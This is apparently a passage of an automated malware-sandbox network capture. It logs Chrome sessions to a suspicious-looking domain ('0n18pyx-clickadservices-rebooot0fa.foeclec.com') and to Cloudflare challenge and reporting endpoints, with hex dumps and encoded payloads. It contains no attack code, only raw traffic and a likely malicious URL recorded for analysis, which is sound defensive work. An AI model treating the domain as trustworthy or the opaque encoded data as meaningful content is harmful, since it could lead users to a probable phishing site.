                                                                                                                                      cf-chl-gen: 8en8Cn1lVXP6aEBBI8pJ+CGRVu1+VySe3hzV4oHXagQ1+Z1H3KHWLn2LomYJJxKzmunRvuyBz9FhoOYRNEQGWoDhUiRHRzs+WCBhLtUx32/s3RaAJRVeXcxoU9xfOubx9el+ONJA4MNQZAgeJPO/D+NtOPvkR4LyI1LmEd5AYAbIUDn/GYX18f30hgfnEpG2XHmPwW3yC8s8GiFipA4PfuAobFiG7vIetEXK6VtjValLhqKgkkCsIMEovE0h8F62CJ+07blq11NHPzVSXQa70HZ3fvBy6te8AUCN7J4X0GMdmyzUEsVMXAUtMzJL4kEaovoEJY7hY+fQhRCn8bMoJSJystLlF7gkVRwqoU+/SX2B+4kyvk+7NxBm7NAuBRPWfVYTM2cBuAtgw6Qmj/iLQJw0J2Pwd5Zm6EbgV388ab81K2/XTTYd/InwwJGVt6sQ$hLWBW4F+FZTaLTdGjGuXag==
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b415b9d9358-SEA
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-05-08 18:12:36 UTC635INData Raw: 35 66 35 0d 0a 6b 59 75 45 6a 6c 2b 4a 56 6b 36 42 6a 34 56 72 6d 35 35 71 65 34 6d 58 6f 6e 43 52 59 49 65 6a 67 33 47 64 71 6d 4f 4a 71 59 71 45 70 61 47 78 70 58 32 74 74 6d 2b 56 6b 72 69 57 69 34 75 38 73 59 6e 42 77 6e 79 52 74 5a 79 77 76 49 71 54 74 63 50 50 6a 37 71 38 70 35 32 74 78 37 4c 58 73 63 76 46 6f 38 32 30 6d 74 36 59 6d 63 4f 74 75 38 4c 48 73 63 4b 67 31 63 6e 46 33 73 4c 73 34 63 69 79 38 71 7a 44 31 38 44 53 31 63 50 46 7a 37 6a 38 78 2b 72 73 33 67 58 59 34 65 59 46 34 66 6e 4a 79 75 44 45 32 4f 50 59 38 4f 48 73 2f 65 44 6e 43 50 54 6e 7a 4f 7a 78 2b 4e 6e 66 2b 78 55 64 33 75 7a 68 48 50 33 69 48 69 4c 38 4c 53 38 67 36 52 73 64 49 65 55 4f 37 42 67 42 45 67 59 6d 45 78 66 30 50 55 41 79 43 68 6b 6c 52 6a 45 44 51 43 4d 7a 53 42
                                                                                                                                      Data Ascii: 5f5kYuEjl+JVk6Bj4Vrm55qe4mXonCRYIejg3GdqmOJqYqEpaGxpX2ttm+VkriWi4u8sYnBwnyRtZywvIqTtcPPj7q8p52tx7LXscvFo820mt6YmcOtu8LHscKg1cnF3sLs4ciy8qzD18DS1cPFz7j8x+rs3gXY4eYF4fnJyuDE2OPY8OHs/eDnCPTnzOzx+Nnf+xUd3uzhHP3iHiL8LS8g6RsdIeUO7BgBEgYmExf0PUAyChklRjEDQCMzSB
                                                                                                                                      2024-05-08 18:12:36 UTC897INData Raw: 6f 38 59 55 4a 66 52 53 68 77 4b 7a 39 46 53 45 39 43 52 57 6c 54 62 44 78 46 58 30 6b 79 56 54 52 69 58 56 73 39 56 48 70 30 57 59 4e 5a 52 59 39 58 69 6c 6c 66 61 55 61 44 54 4a 56 33 55 6e 71 4b 65 35 52 59 63 46 5a 71 64 6e 6c 6a 6c 57 52 77 65 49 4b 61 5a 49 31 36 64 71 4f 65 59 36 69 77 66 5a 57 68 71 72 43 52 64 4b 71 52 73 72 65 51 72 62 32 62 6f 61 79 74 77 63 53 2f 69 4b 6a 42 67 73 4b 62 72 4b 2f 4c 76 4d 66 51 71 4a 58 50 70 35 65 30 79 71 79 32 33 62 7a 54 73 64 33 6b 73 4c 2f 55 78 5a 71 33 32 63 48 6d 71 63 7a 71 75 74 7a 65 32 39 54 44 34 73 76 47 74 64 58 52 75 4d 76 35 39 63 79 39 41 39 48 41 30 77 50 39 31 4d 55 4b 41 4d 6a 62 43 4d 72 63 7a 52 48 78 30 4f 4d 51 39 2b 54 56 47 4e 54 59 36 78 6e 61 37 4e 30 66 34 53 54 62 2b 68 54 67 38
                                                                                                                                      Data Ascii: o8YUJfRShwKz9FSE9CRWlTbDxFX0kyVTRiXVs9VHp0WYNZRY9XillfaUaDTJV3UnqKe5RYcFZqdnljlWRweIKaZI16dqOeY6iwfZWhqrCRdKqRsreQrb2boaytwcS/iKjBgsKbrK/LvMfQqJXPp5e0yqy23bzTsd3ksL/UxZq32cHmqczqutze29TD4svGtdXRuMv59cy9A9HA0wP91MUKAMjbCMrczRHx0OMQ9+TVGNTY6xna7N0f4STb+hTg8
                                                                                                                                      2024-05-08 18:12:36 UTC1369INData Raw: 31 35 63 32 0d 0a 51 48 75 78 2f 33 43 2b 73 2f 52 36 78 44 6f 42 2b 59 4b 35 76 6a 70 45 68 62 5a 48 76 67 41 38 78 38 58 38 67 55 54 48 75 6f 72 48 76 30 4d 34 53 49 42 36 76 49 51 44 50 49 33 38 41 55 49 42 42 59 4a 45 41 34 61 47 7a 55 57 49 7a 77 36 51 44 59 64 53 52 73 6e 4a 43 74 50 49 41 77 51 48 44 34 54 4f 46 52 49 4f 7a 42 62 54 46 4d 31 4b 45 74 41 49 79 4e 63 52 6b 45 34 56 7a 6b 38 51 43 74 6a 50 6b 78 46 54 6a 78 41 53 57 68 59 52 55 64 53 61 6d 52 74 57 34 42 58 4f 7a 70 69 50 56 46 6b 67 55 52 66 53 6e 39 36 66 56 35 38 53 47 4b 4f 53 31 4e 64 53 47 78 79 57 48 74 6c 68 5a 42 76 58 35 68 32 65 35 78 67 66 33 68 69 70 33 57 65 61 32 75 58 61 58 71 52 6f 61 32 70 68 59 43 66 6f 4b 4f 57 72 70 57 32 74 5a 36 38 66 49 42 2b 6b 71 2f 42 6e 35
                                                                                                                                      Data Ascii: 15c2QHux/3C+s/R6xDoB+YK5vjpEhbZHvgA8x8X8gUTHuorHv0M4SIB6vIQDPI38AUIBBYJEA4aGzUWIzw6QDYdSRsnJCtPIAwQHD4TOFRIOzBbTFM1KEtAIyNcRkE4Vzk8QCtjPkxFTjxASWhYRUdSamRtW4BXOzpiPVFkgURfSn96fV58SGKOS1NdSGxyWHtlhZBvX5h2e5xgf3hip3Wea2uXaXqRoa2phYCfoKOWrpW2tZ68fIB+kq/Bn5
                                                                                                                                      2024-05-08 18:12:36 UTC1369INData Raw: 44 50 7a 4a 42 64 41 53 33 76 50 55 42 64 45 4f 34 68 59 49 2b 50 76 64 49 76 67 43 37 2f 41 61 33 52 48 79 48 75 58 33 39 39 38 6a 4a 78 77 52 35 41 67 65 49 53 2f 76 4b 78 6b 77 44 44 77 4a 43 78 6b 7a 49 77 41 6c 4c 79 45 61 4b 54 63 4b 52 41 59 68 4b 67 34 6f 47 55 35 4e 4c 69 45 6a 4a 54 6b 7a 4c 6a 4e 62 4b 42 6f 70 4f 56 67 69 56 79 39 6b 48 46 45 6d 51 46 51 39 5a 6a 56 71 4a 53 49 78 58 32 68 78 51 6d 4e 4b 4e 54 63 77 52 30 52 4d 66 6b 39 67 66 54 6c 4f 54 6e 74 32 56 31 31 62 65 46 35 56 64 59 53 51 67 31 46 45 66 32 32 4b 62 45 39 6c 64 58 6d 54 56 49 39 39 6c 48 43 67 62 57 2b 41 6e 59 52 67 65 70 39 38 68 36 64 6d 6a 6f 61 59 63 62 4f 41 69 34 46 2b 69 72 47 46 71 59 53 4b 65 72 43 76 65 35 57 62 6e 62 75 75 70 72 2b 32 77 4b 53 46 72 62 69
                                                                                                                                      Data Ascii: DPzJBdAS3vPUBdEO4hYI+PvdIvgC7/Aa3RHyHuX3998jJxwR5AgeIS/vKxkwDDwJCxkzIwAlLyEaKTcKRAYhKg4oGU5NLiEjJTkzLjNbKBopOVgiVy9kHFEmQFQ9ZjVqJSIxX2hxQmNKNTcwR0RMfk9gfTlOTnt2V11beF5VdYSQg1FEf22KbE9ldXmTVI99lHCgbW+AnYRgep98h6dmjoaYcbOAi4F+irGFqYSKerCve5Wbnbuupr+2wKSFrbi
                                                                                                                                      2024-05-08 18:12:36 UTC1369INData Raw: 68 66 70 36 2b 48 6f 38 39 54 54 48 68 7a 71 47 39 6a 68 45 74 59 6a 48 41 4d 43 41 51 6f 6f 42 69 63 72 2b 41 63 63 45 44 41 4f 4c 79 73 42 44 79 51 55 4f 42 59 32 2b 77 6b 58 4c 42 52 41 48 6a 38 68 45 52 38 30 46 45 67 6d 53 45 41 66 45 43 59 6b 42 69 35 51 51 79 6f 73 4f 53 63 39 44 30 34 2f 4c 55 34 55 4f 56 51 33 48 56 56 66 58 43 67 64 56 44 35 76 4e 30 46 64 58 53 6c 63 58 56 64 76 4d 47 74 76 63 45 78 34 4e 6e 46 56 4f 6d 4a 61 62 45 35 63 66 6f 56 46 64 31 52 63 69 56 6c 62 62 6f 68 4d 5a 57 43 4a 64 34 75 42 68 6e 70 53 55 6c 69 66 64 6e 46 39 67 6c 6d 65 6f 36 4b 68 67 6e 65 48 5a 36 43 6f 59 48 71 66 6f 61 47 44 6c 59 79 65 72 6f 69 31 68 36 32 52 64 70 32 73 71 49 6c 30 75 73 4b 42 6e 73 61 59 78 61 57 58 70 38 4b 32 71 61 7a 43 79 4a 44 4f
                                                                                                                                      Data Ascii: hfp6+Ho89TTHhzqG9jhEtYjHAMCAQooBicr+AccEDAOLysBDyQUOBY2+wkXLBRAHj8hER80FEgmSEAfECYkBi5QQyosOSc9D04/LU4UOVQ3HVVfXCgdVD5vN0FdXSlcXVdvMGtvcEx4NnFVOmJabE5cfoVFd1RciVlbbohMZWCJd4uBhnpSUlifdnF9glmeo6KhgneHZ6CoYHqfoaGDlYyeroi1h62Rdp2sqIl0usKBnsaYxaWXp8K2qazCyJDO
                                                                                                                                      2024-05-08 18:12:36 UTC1369INData Raw: 58 75 39 42 4c 71 36 64 38 69 34 53 55 59 39 69 45 58 43 4e 7a 7a 4a 50 30 41 35 78 38 42 45 66 73 6c 38 42 41 31 4c 42 6a 34 4a 76 58 76 4f 68 45 42 51 68 4d 68 41 79 49 56 42 44 67 34 4c 45 64 4c 4e 30 45 47 44 30 51 37 56 55 4d 78 53 78 5a 57 4b 52 70 62 47 7a 6f 75 4c 45 35 4b 57 6c 67 75 56 6b 56 62 55 7a 30 68 49 30 45 6f 58 48 42 50 4d 45 45 71 62 30 74 52 65 48 68 6a 52 6b 6c 33 55 58 73 33 66 6a 52 68 4e 6e 35 50 68 57 42 35 58 58 68 38 52 57 6c 47 6a 6d 39 79 58 56 4e 77 69 48 2b 55 68 33 57 51 5a 6f 61 51 68 31 65 50 66 5a 68 73 6a 70 69 51 65 4b 68 67 64 6e 61 61 6f 4a 68 2f 6f 61 4a 72 73 34 4f 6a 73 49 36 4f 6a 71 65 46 6c 48 79 2f 71 4c 4f 35 72 4a 53 34 74 37 53 79 67 63 69 48 74 61 43 39 70 4d 58 50 75 38 61 64 6b 38 69 2f 30 38 65 31 7a
                                                                                                                                      Data Ascii: Xu9BLq6d8i4SUY9iEXCNzzJP0A5x8BEfsl8BA1LBj4JvXvOhEBQhMhAyIVBDg4LEdLN0EGD0Q7VUMxSxZWKRpbGzouLE5KWlguVkVbUz0hI0EoXHBPMEEqb0tReHhjRkl3UXs3fjRhNn5PhWB5XXh8RWlGjm9yXVNwiH+Uh3WQZoaQh1ePfZhsjpiQeKhgdnaaoJh/oaJrs4OjsI6OjqeFlHy/qLO5rJS4t7SygciHtaC9pMXPu8adk8i/08e1z
                                                                                                                                      2024-05-08 18:12:36 UTC102INData Raw: 51 48 66 73 43 47 42 51 65 43 53 49 48 42 67 50 6b 4c 41 6f 72 4b 2f 77 4c 49 42 67 30 45 6a 4c 73 42 52 4d 6f 44 44 77 61 4f 76 73 4e 47 79 38 48 52 43 4a 44 49 52 55 6a 4e 30 73 50 50 6c 4d 69 54 79 31 41 4d 42 68 52 54 6a 73 71 4c 6b 73 6e 4d 55 38 69 47 55 78 42 48 43 38 35 56 43 6f 68 56 45 34 0d 0a
                                                                                                                                      Data Ascii: QHfsCGBQeCSIHBgPkLAorK/wLIBg0EjLsBRMoDDwaOvsNGy8HRCJDIRUjN0sPPlMiTy1AMBhRTjsqLksnMU8iGUxBHC85VCohVE4
                                                                                                                                      2024-05-08 18:12:37 UTC1109INData Raw: 34 34 65 0d 0a 6b 4e 30 46 64 58 53 6c 63 58 57 4d 2f 53 57 55 36 4d 57 52 63 65 30 64 52 61 6e 74 39 4e 6e 4a 2f 58 56 52 35 5a 6b 4e 33 62 45 75 44 66 6f 70 4a 61 57 68 64 55 47 5a 30 63 6c 46 6b 61 58 53 4f 58 33 4e 76 6a 35 46 57 6b 58 4e 77 70 58 46 70 6e 36 53 74 71 6f 32 5a 6f 58 71 45 70 37 4f 4a 6c 71 65 33 6a 6f 31 36 75 4c 5a 34 71 6e 79 2b 6c 4a 4f 46 73 4d 69 44 73 37 58 4a 79 61 62 43 75 70 36 70 78 4b 79 6a 72 61 4f 6e 31 61 32 32 32 71 6d 30 7a 74 75 67 34 4a 6d 69 30 4a 7a 6e 30 2b 6a 63 31 37 4f 35 75 64 75 36 38 4c 76 77 33 4c 54 65 77 4d 66 79 36 63 33 5a 39 66 72 6f 37 75 7a 51 37 2f 6e 34 78 64 62 30 30 51 63 4d 43 76 51 41 42 2b 41 4f 44 4f 30 42 2f 73 33 4f 45 4e 41 4e 2b 52 58 73 48 43 44 72 2b 67 76 63 31 52 6f 58 32 43 4c 6f 42
                                                                                                                                      Data Ascii: 44ekN0FdXSlcXWM/SWU6MWRce0dRant9NnJ/XVR5ZkN3bEuDfopJaWhdUGZ0clFkaXSOX3Nvj5FWkXNwpXFpn6Stqo2ZoXqEp7OJlqe3jo16uLZ4qny+lJOFsMiDs7XJyabCup6pxKyjraOn1a222qm0ztug4Jmi0Jzn0+jc17O5udu68Lvw3LTewMfy6c3Z9fro7uzQ7/n4xdb00QcMCvQAB+AODO0B/s3OENAN+RXsHCDr+gvc1RoX2CLoB
                                                                                                                                      2024-05-08 18:12:37 UTC599INData Raw: 32 35 30 0d 0a 36 74 2b 72 35 35 72 6a 4a 46 73 68 4a 2b 71 72 37 6d 4f 74 71 4f 33 6e 4a 39 37 6f 58 32 55 6e 59 32 33 6f 36 47 30 68 36 4f 56 6e 4b 79 67 6f 37 36 68 71 34 57 74 7a 73 36 67 72 73 4c 57 6d 73 6e 65 72 64 71 34 79 37 75 6a 33 4e 6e 47 74 62 6e 57 34 36 50 56 72 63 4b 35 34 4b 50 69 36 72 2f 78 36 65 2f 44 77 76 58 6b 76 4d 33 52 37 74 66 62 75 51 48 6b 7a 67 6a 32 77 2b 54 70 78 4e 7a 33 41 77 67 53 35 67 2f 37 45 50 54 33 30 2f 6e 56 37 50 58 6c 45 50 76 35 44 64 2f 37 37 66 51 46 33 69 4d 53 35 76 50 64 42 69 63 6e 2b 41 63 62 4c 2f 49 69 4e 77 59 7a 45 53 51 55 2b 7a 55 79 48 77 34 53 4b 7a 31 45 51 68 63 32 50 77 55 5a 43 6a 52 46 49 52 63 68 50 52 35 52 48 78 39 51 46 55 5a 4f 4e 46 46 4a 50 54 4d 33 53 55 77 71 4e 46 56 68 4f 42 6b
                                                                                                                                      Data Ascii: 2506t+r55rjJFshJ+qr7mOtqO3nJ97oX2UnY23o6G0h6OVnKygo76hq4Wtzs6grsLWmsnerdq4y7uj3NnGtbnW46PVrcK54KPi6r/x6e/DwvXkvM3R7tfbuQHkzgj2w+TpxNz3AwgS5g/7EPT30/nV7PXlEPv5Dd/77fQF3iMS5vPdBicn+AcbL/IiNwYzESQU+zUyHw4SKz1EQhc2PwUZCjRFIRchPR5RHx9QFUZONFFJPTM3SUwqNFVhOBk


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      17192.168.2.164973435.190.80.14435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:36 UTC573OUTOPTIONS /report/v4?s=%2FzQrYwphdkQ9cRlxtCzeadwr8bJsrSW5JVzzaf%2Fj2CvBEQvx%2BPRky%2FVJ42nvfO54nnICGL9l21TisUaXQLbX%2Bv7EK%2FAnmEFTxrJcF2Cm4kSNFS%2FH5hHbHpaXQBDfvQ%3D%3D HTTP/1.1
                                                                                                                                      Host: a.nel.cloudflare.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Access-Control-Request-Method: POST
                                                                                                                                      Access-Control-Request-Headers: content-type
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:37 UTC336INHTTP/1.1 200 OK
                                                                                                                                      content-length: 0
                                                                                                                                      access-control-max-age: 86400
                                                                                                                                      access-control-allow-methods: OPTIONS, POST
                                                                                                                                      access-control-allow-origin: *
                                                                                                                                      access-control-allow-headers: content-length, content-type
                                                                                                                                      date: Wed, 08 May 2024 18:12:36 GMT
                                                                                                                                      Via: 1.1 google
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      18192.168.2.164973635.190.80.14435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:37 UTC484OUTPOST /report/v4?s=%2FzQrYwphdkQ9cRlxtCzeadwr8bJsrSW5JVzzaf%2Fj2CvBEQvx%2BPRky%2FVJ42nvfO54nnICGL9l21TisUaXQLbX%2Bv7EK%2FAnmEFTxrJcF2Cm4kSNFS%2FH5hHbHpaXQBDfvQ%3D%3D HTTP/1.1
                                                                                                                                      Host: a.nel.cloudflare.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Content-Length: 490
                                                                                                                                      Content-Type: application/reports+json
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:37 UTC490OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 37 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 30 6e 31 38 70 79 78 2d 63 6c 69 63 6b 61 64 73 65 72 76 69 63 65 73 2d 72 65 62 6f 6f 6f 74 30 66 61 2e 66 6f 65 63 6c 65 63 2e 63 6f 6d 2f 37 46 46 38 38 42 31 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 31 35 2e 31 34 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70
                                                                                                                                      Data Ascii: [{"age":0,"body":{"elapsed_time":177,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/7FF88B1/","sampling_fraction":1.0,"server_ip":"104.21.15.140","status_code":404,"type":"http
                                                                                                                                      2024-05-08 18:12:37 UTC168INHTTP/1.1 200 OK
                                                                                                                                      content-length: 0
                                                                                                                                      date: Wed, 08 May 2024 18:12:37 GMT
                                                                                                                                      Via: 1.1 google
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      19192.168.2.1649737104.17.2.1844435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:37 UTC486OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/830379481:1715189460:4WJq2FlgaBnGPk-EL3xJ9pAJ6u5-Y1Cc3OADuoMfqYo/880b6b356a282766/84d6ba6304ae385 HTTP/1.1
                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:38 UTC377INHTTP/1.1 400 Bad Request
                                                                                                                                      Date: Wed, 08 May 2024 18:12:37 GMT
                                                                                                                                      Content-Type: application/json
                                                                                                                                      Content-Length: 7
                                                                                                                                      Connection: close
                                                                                                                                      cf-chl-out: a0AEUNcfnedf8k+miOJKHA==$5rkV21d8EJCT+GmvKbG4XA==
                                                                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b493ac027d6-SEA
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-05-08 18:12:38 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                      Data Ascii: invalid


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      20192.168.2.1649738104.17.3.1844435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:38 UTC775OUTGET /cdn-cgi/challenge-platform/h/b/i/880b6b356a282766/1715191956873/EUH-Q4aQROypa1l HTTP/1.1
                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/l704j/0x4AAAAAAAXFrE9g55weHUfb/auto/normal
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:38 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:38 GMT
                                                                                                                                      Content-Type: image/png
                                                                                                                                      Content-Length: 61
                                                                                                                                      Connection: close
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b4c7f9475a6-SEA
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-05-08 18:12:38 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5a 00 00 00 21 08 02 00 00 00 d6 2f 2b 57 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                      Data Ascii: PNGIHDRZ!/+WIDAT$IENDB`


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      21192.168.2.1649739104.17.2.1844435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:38 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/880b6b356a282766/1715191956873/EUH-Q4aQROypa1l HTTP/1.1
                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:39 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:39 GMT
                                                                                                                                      Content-Type: image/png
                                                                                                                                      Content-Length: 61
                                                                                                                                      Connection: close
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b50eee7c380-SEA
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-05-08 18:12:39 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5a 00 00 00 21 08 02 00 00 00 d6 2f 2b 57 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                      Data Ascii: PNGIHDRZ!/+WIDAT$IENDB`


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      22192.168.2.1649740104.17.3.1844435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:39 UTC804OUTGET /cdn-cgi/challenge-platform/h/b/pat/880b6b356a282766/1715191956877/5f91988cb904a772a0d7013b0eebdf49616ba81fc4a186eda4e2c4c46e2c8d0b/vUcqapM6Nl_iDO3 HTTP/1.1
                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/l704j/0x4AAAAAAAXFrE9g55weHUfb/auto/normal
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:39 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                      Date: Wed, 08 May 2024 18:12:39 GMT
                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                      Content-Length: 1
                                                                                                                                      Connection: close
                                                                                                                                      2024-05-08 18:12:39 UTC1382INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 58 35 47 59 6a 4c 6b 45 70 33 4b 67 31 77 45 37 44 75 76 66 53 57 46 72 71 42 5f 45 6f 59 62 74 70 4f 4c 45 78 47 34 73 6a 51 73 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                      Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gX5GYjLkEp3Kg1wE7DuvfSWFrqB_EoYbtpOLExG4sjQsAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                      2024-05-08 18:12:39 UTC1INData Raw: 4a
                                                                                                                                      Data Ascii: J


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
